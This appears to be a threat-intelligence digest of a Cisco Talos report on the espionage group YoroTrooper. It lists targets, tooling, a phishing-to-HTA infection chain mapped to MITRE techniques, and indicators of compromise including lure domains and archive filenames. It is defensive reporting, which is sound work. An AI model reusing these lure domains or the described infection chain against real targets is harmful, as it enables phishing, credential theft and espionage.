Cisco Talos has identified a new espionage actor named YoroTrooper active since at least June 2022, targeting CIS governments, embassies, and a EU health care agency and WIPO. The group uses Python-based information stealers, commodity RATs (AveMaria/Warzone, LodaRAT, Meterpreter), and a multi-stage infection chain (LNKs and HTA) to exfiltrate credentials, browser data, and documents. #YoroTrooper #StinkStealer #AveMaria #WarzoneRAT #LodaRAT #Meterpreter #WIPO #EUHealthCareAgency #Azerbaijan #CIS
Keypoints
- New threat actor named YoroTrooper identified by Cisco Talos, active since at least June 2022.
- Targets include government and energy entities in CIS countries, plus embassies and at least one EU health-care agency and WIPO.
- Stolen data encompasses credentials, browser histories & cookies, system information, and screenshots.
- Tools span Python-based information stealers (wrapped in executables) and commodity RATs (AveMaria/Warzone, LodaRAT, Meterpreter).
- Infection chain relies on phishing with archives containing LNKs and decoy PDFs; LNKs trigger mshta to fetch HTA payloads.
- Some overlap reported with PoetRAT/Kasablanka but no definitive attribution; LodaRAT variants appear across multiple operators.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Attachment – Initial access via phishing emails with an attached archive containing a shortcut file and a decoy PDF. ‘The initial attack vectors are phishing emails with a file attached, which usually consists of an archive consisting of two files: a shortcut file and a decoy PDF file.’
- [T1105] Ingress Tool Transfer – LNKs download and execute a remote HTA via mshta.exe. ‘The malicious LNK files are simple downloaders that employ mshta.exe to download and execute a remote HTA file on the infected endpoint.’
- [T1218.005] HTML Application – HTA delivery of payloads – HTA downloads decoy documents and dropper implants. ‘HTA downloads decoy documents and dropper implants.’
- [T1059.001] PowerShell – Command and Scripting Interpreter – Execution of payloads through PowerShell-based commands. ‘All these tasks are accomplished by running PowerShell-based commands.’
- [T1059.006] Python – Python-based malware tooling – Custom Python-based information stealers and RATs, often packed into executables. ‘Custom Python-based information stealers’ and ‘Python-based information stealers… wrapped up into an executable using frameworks such as Nuitka or PyInstaller.’
- [T1027] Obfuscated/Compressed Files – Packaging Python payloads into executables (Nuitka/PyInstaller) that may leak code. ‘wrapped up into an executable using frameworks such as Nuitka or PyInstaller.’
- [T1555.003] Credentials from Web Browsers – Stealers collect browser credentials (Chrome) and other data. ‘stolen data reveals credentials from multiple browsers’ and ‘Chrome browser credentials.’
- [T1071.001] Web Protocols – Telegram-based C2/Exfiltration – Malware uses Telegram bots to exfiltrate data or receive commands. ‘This bot was wrapped up into a .exe either using PyInstaller or Nuitka and then deployed in the field… Telegram bots to exfiltrate information or receive commands from the operator.’
Indicators of Compromise
- [Domain] Malicious domains masquerading as CIS/government entities – example domains from the table include mail.mfa.az-link.email, akipress.news, maileecommission.inro.link, sts.mfa.gov.tr.mypolicy.top, industry.tj.mypolicy.top, mail.mfa.az-link.email, belaes.by.authentication.becloud.cc, belstat.gov.by.attachment-posts.cc, minsk.gov.by.attachment-posts.cc
- [Domain] Additional masked domains used as lures – example: mail.[].openingfile.net, akipress.news, maileecommission.inro.link
- [File] Archive/lure filenames used in campaigns – examples: National_Development_Strategy.rar, Presidents_Strategy_2023.rar, Nota.rar, вложение.rar
- [File] LNK-based dropper/HTA delivery chain components (HTA decoys) – referenced throughout infection chain
Read more: https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/